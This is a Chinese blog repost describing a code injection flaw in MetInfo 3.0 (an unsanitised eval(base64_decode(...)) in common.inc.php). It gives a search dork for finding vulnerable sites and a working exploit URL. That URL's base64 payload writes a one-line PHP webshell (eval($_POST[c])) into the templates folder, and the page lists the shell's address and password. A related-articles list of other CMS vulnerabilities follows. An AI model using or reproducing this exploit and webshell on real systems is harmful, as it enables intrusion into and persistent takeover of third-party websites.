MetInfo 3.0 PHP代码注入漏洞(getshell)

最新推荐文章于 2024-05-10 23:56:01 发布
最新推荐文章于 2024-05-10 23:56:01 发布
阅读量1.4k 收藏
点赞数
分类专栏: PHP安全

MetInfo 3.0 PHP代码注入漏洞(getshell)

来源:本站转载  作者:佚名  时间:2010-11-07  TAG:  我要投稿

官网:http://www.metinfo.cn/
关键字:"Powered by MetInfo 3.0 " 

来源:http://www.myhack58.com/Article/html/3/62/2010/28291.htm
描述:
在文件/include/common.inc.php第67行:
eval(base64_decode($allclass[0]));
$allclass[0] 变量未初始化 ,因此我们可以控制其值,进行代码注入的利用。

POC:http://target.com/include/common.inc.php?allclass[0]=[base64_encode(eval php code)]


Exploit:
http://target.com/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==


base64编码部分内容为fputs(fopen('../templates/test.php','w+'),'<?php eval($_POST[c]);?>');

一句话后门地址:http://target.com/templates/test.php 密码:c


另一篇文章:http://www.zysafe.com/html/holes/03/2012110838257.html

kendyhj9999
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WeiPHP 微信开发平台 SQL注入漏洞复现
0xSec
12-05 910
weiphp微信开发平台 _send_by_group、wp_where、 get_package_template等接口处存在SQL注入漏洞,攻击者利用此漏洞可获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
metinfo5.0 文件包含漏洞分析
Au_Wind的博客
11-06 264
基于代码审计,对metinfo5.0文件包含漏洞分析复现
记一次MetInfo6.0.0文件包含漏洞复现
weixin_55404107的博客
10-20 1727
进行漏洞复现,读取敏感文件
漏洞挖掘姿势之metinfo 建站系统-任意文件读取漏洞
最新发布
Grace_for_it的博客
05-10 476
metinfo 建站系统 任意文件读取漏洞 漏洞挖掘
漏洞复现】Metinfo6.0.0任意文件读取漏洞复现
过期的秋刀鱼
11-05 383
dir变量接受来自$_GET[‘dir’]传递进来的值,用了str_replace函数做替换,将。漏洞简介:MetInfo是一套使用PHP和MySQL开发的内容管理系统,其中的。文件存在任意文件读取漏洞,攻击者可利用该漏洞读取网站的敏感文件。漏洞名称:MetInfo任意文件读取。影响版本:MetInfo 6.0.0。
WeiPHP5.0远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
03-12 725
weiphp 是一个开源,高效,简洁的微信开发平台,它是基于 oneThink 这个简单而强大的内容管理框架实现的。weiphp 的目的是最大化的简化微信开发的流程,使用开发者能把最好的精力放到微信具体业务开发,并能以最快的时间完成。把一些常规而频繁的工作交由 weiphp 来处理即可。
metinfo 后台sql注入1
08-03
MetInfo 后台SQL注入漏洞详解》 MetInfo,一款基于PHP和MySQL构建的内容管理系统,因其功能丰富和易于使用而广受欢迎。然而,随着技术的发展,安全问题也日益凸显。本文将深入探讨MetInfo 6.1.0版本中的一个SQL...
MetInfo企业网站管理系统 v3.0版
03-26
MetInfo企业网站管理系统v3.0 开发进展与最新情况请访问官方网站:www.metinfo.cn。 全新安装:将压缩包内的所有文件上传到空间,运行网站地址便可以自动安装! 本安装程序更新日期为2010年3月10日,最新程序及免费...
php注入代码
10-12
1.将waf.php传到要包含的文件的目录 ...Metinfo \include\head.php b).在每个文件最前加上代码php.ini中找到: Automatically add files before or after any PHP document. auto_prepend_file = waf.php路径;
MetInfo7.5.0代码审计(后台SQL注入+md5弱类型比较)1
08-03
MetInfo 7.5.0 代码审计 - 后台 SQL 注入漏洞 MetInfo 7.5.0 是一款知名的内容管理系统(CMS),其最新版本 7.5.0 中存在着严重的后台 SQL 注入漏洞。本文将详细介绍该漏洞的发现过程和利用方法。 一、环境说明 ...
MetInfo_php源码_
09-30
MetInfo PHP website system is a collection of "computer mobile site WeChat public" triad of company system
[代码审计]Weiphp5.0 前台文件任意读取分析
Y4tacker的博客
05-09 1281
文章目录前言分析 前言 最近一直在刷CNVD吧,大概两周刷了四页多,感觉自己水平也在见着长高,今天来分析一下Weiphp,毕竟也很久没写过博客了 分析 漏洞所在的函数为application/material/controller/Material.php下的_download_imgage函数,正好这是一个public方法,根据thinkphp的路由规则我们不难得到传参方式,这里直接先给出exp然后继续分析好吧 http://ddcms.top//public/index.php/material/Ma
01、版本管理-GIT
快把钟哥带走
06-12 162
一、版本控制 版本控制,通过文档控制记录各个模块的改动,并给每次改动添加序号,用于存储、追踪目录和文件的修改历史。 二、版本控制软件 GIT 分布式版本控制系统 SVN 集中式版本控制系统 三、git安装 1、git下载 - https://git-scm.com/downloads - https://pan.baidu.com/s/1kU5OCOB#list/path=%2...
metinfo 6.0 任意文件读取漏洞
weixin_51559599的博客
11-14 658
网页路径代码路径。
metinfo多个漏洞(可getshell)
kendyhj9999的专栏
05-21 2890
http://www.wooyun.org/bugs/wooyun-2010-043795
网站漏洞修复公司 对网站上传文件漏洞的修复与安全加固
网站安全专家
07-12 988
Metinfo CMS系统被爆出网站存在漏洞,可上传任意文件到网站根目录下,从而使攻击者可以轻易的获取网站的webshell权限,对网站进行篡改与攻击,目前该网站漏洞影响范围是Metinfo 6.2.0最新版本,以及以前的所有Metinfo版本都可以利用,关于该Metinfo漏洞的详情我们来详细的分析: 首先该网站漏洞的利用前提是windows系统,PHP语言的版本是小于5.3,相当于旧的服...
Web渗透-一次艰难获取后台经历-metinfo5.3.18密码重置漏洞复现
qq_45066095的博客
08-26 1070
前期准备 内部搭建环境进行了一次为期两天的演练,通过给的测试地址发现这是一个静态网页,发现URL中有参数id=某某数,心想着这就要被我挖掘出来了,我激动的手指颤抖着敲打键盘,尝试用sqlmap跑了下发现进行了拦截,最后手工尝试也没成功。然后又尝试看有没有跨站漏洞,发现对输入的数据进行了过滤。内心一下子就拔凉拔凉的,打算擦干眼泪接着整,不信挖掘不到漏洞,准备大干一场。开始扫描端口和目录,余光一扫看到吃饭点了,迅速关上电脑迈着欢快的步伐。。。。。。 挖掘漏洞 吃得饱饱的回来查看开放的端口 发现开放shh,进行
MetInfo最新网站漏洞如何修复以及网站安全防护
网站安全专家
10-22 1977
metinfo漏洞于2018年10月20号被爆出存在sql注入漏洞,可以直接拿到网站管理员的权限,网站漏洞影响范围较广,包括目前最新的metinfo版本都会受到该漏洞的攻击,该metinfo漏洞产生的主要原因是可以绕过metinfo的安全过滤函数,导致可以直接插入恶意的sql注入语句执行到网站的后端里去,在数据库里执行管理员操作的一些功能,甚至可以直接sql注入到首页文件index.php去获取到...
微信开发学习日记(五):weiphp开源框架的bug,公众号权限编辑问题
weixin_30867015的博客
04-14 123
最近在研究weiphp,总体感觉还行,bug据说还挺多。这不,我就遇到一个比较严重影响使用的。感觉不太应该出现这么严重的bug啊。 weiphp的微信公众号等级,权限增加和编辑bug,看不到权限列表,只能看到“好人”和“环境”2个不正确的插件名称。[系统BUG] 用户权限无法正常显示问题描述:用户->公众号等级->编辑 出现好人与环境两个插件解决办法:后台新增加公众帐号等级错误...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值